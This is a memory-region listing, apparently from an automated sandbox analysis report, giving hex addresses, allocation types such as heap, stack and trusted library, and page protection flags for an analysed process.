unkown
page read and write
244A0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
31C3000
trusted library allocation
page execute and read and write
5BF0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2186F000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
21527000
stack
page read and write
2B9C000
stack
page read and write
8600000
heap
page read and write
237E0000
trusted library allocation
page read and write
21978000
trusted library allocation
page read and write
2192B000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
2164E000
stack
page read and write
7190000
direct allocation
page read and write
23688000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
21490000
direct allocation
page read and write
244C0000
trusted library allocation
page read and write
31D0000
trusted library allocation
page read and write
215C0000
heap
page execute and read and write
244A0000
trusted library allocation
page read and write
24490000
trusted library allocation
page execute and read and write
329F000
stack
page read and write
2143E000
stack
page read and write
2173F000
trusted library allocation
page read and write
244D0000
trusted library allocation
page read and write
88DF000
heap
page read and write
244B0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
244B0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
757E000
stack
page read and write
760D000
heap
page read and write
21280000
trusted library allocation
page read and write
226A1000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
2135E000
stack
page read and write
244F0000
trusted library allocation
page read and write
31CD000
trusted library allocation
page execute and read and write
8437000
stack
page read and write
4E4E000
stack
page read and write
2210000
heap
page read and write
28A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2196E000
trusted library allocation
page read and write
28A2000
trusted library allocation
page read and write
24850000
trusted library allocation
page read and write
237A0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
5C57000
heap
page read and write
239FE000
stack
page read and write
237E0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23B36000
heap
page read and write
2372B000
trusted library allocation
page read and write
229D4000
trusted library allocation
page read and write
7A10000
trusted library allocation
page read and write
707E000
stack
page read and write
23B4A000
heap
page read and write
24480000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5BE0000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
21926000
trusted library allocation
page read and write
228A7000
trusted library allocation
page read and write
27DF000
stack
page read and write
244A0000
trusted library allocation
page read and write
71A0000
direct allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
7440000
heap
page read and write
4B0000
heap
page read and write
244A0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
892D000
heap
page read and write
26DE000
stack
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
24626000
trusted library allocation
page read and write
22A05000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
5FEA000
trusted library allocation
page read and write
4FE000
stack
page read and write
24480000
trusted library allocation
page read and write
227DE000
trusted library allocation
page read and write
28B0000
trusted library allocation
page execute and read and write
244C0000
trusted library allocation
page read and write
4EA0000
heap
page execute and read and write
24480000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
24860000
trusted library allocation
page read and write
2873000
trusted library allocation
page execute and read and write
88E1000
heap
page read and write
5BB0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
407000
unkown
page readonly
2890000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
5C0000
heap
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7150000
direct allocation
page read and write
237E1000
trusted library allocation
page read and write
30F0000
heap
page read and write
304E000
stack
page read and write
30E5000
heap
page read and write
5BF0000
trusted library allocation
page read and write
28A5000
trusted library allocation
page execute and read and write
2374D000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
32C8000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
3210000
trusted library allocation
page read and write
32E7000
heap
page read and write
2372E000
trusted library allocation
page read and write
5CE000
heap
page read and write
4E0C000
stack
page read and write
24480000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
606000
heap
page read and write
5BD0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2130F000
stack
page read and write
448000
unkown
page readonly
24840000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
8840000
heap
page read and write
300E000
stack
page read and write
244F0000
trusted library allocation
page execute and read and write
24480000
trusted library allocation
page read and write
288D000
trusted library allocation
page execute and read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24600000
trusted library allocation
page read and write
24610000
trusted library allocation
page read and write
226A9000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
400000
unkown
page readonly
21864000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24655000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
3111000
heap
page read and write
238C1000
heap
page read and write
245AE000
stack
page read and write
7100000
direct allocation
page read and write
8A80000
direct allocation
page execute and read and write
23780000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
22A1D000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
21AE000
stack
page read and write
237E0000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
21903000
trusted library allocation
page read and write
21766000
trusted library allocation
page read and write
31F0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
243BE000
stack
page read and write
79E0000
trusted library allocation
page read and write
5D10000
direct allocation
page read and write
565000
heap
page read and write
244C0000
trusted library allocation
page read and write
22769000
trusted library allocation
page read and write
24600000
trusted library allocation
page read and write
5BA0000
trusted library allocation
page read and write
3B50000
remote allocation
page execute and read and write
238C0000
heap
page read and write
2290000
heap
page read and write
237E0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
8450000
trusted library allocation
page execute and read and write
244F0000
trusted library allocation
page read and write
244B0000
trusted library allocation
page execute and read and write
23790000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
24652000
trusted library allocation
page read and write
611000
heap
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
2892000
trusted library allocation
page read and write
There are 860 hidden memdumps, click here to show them.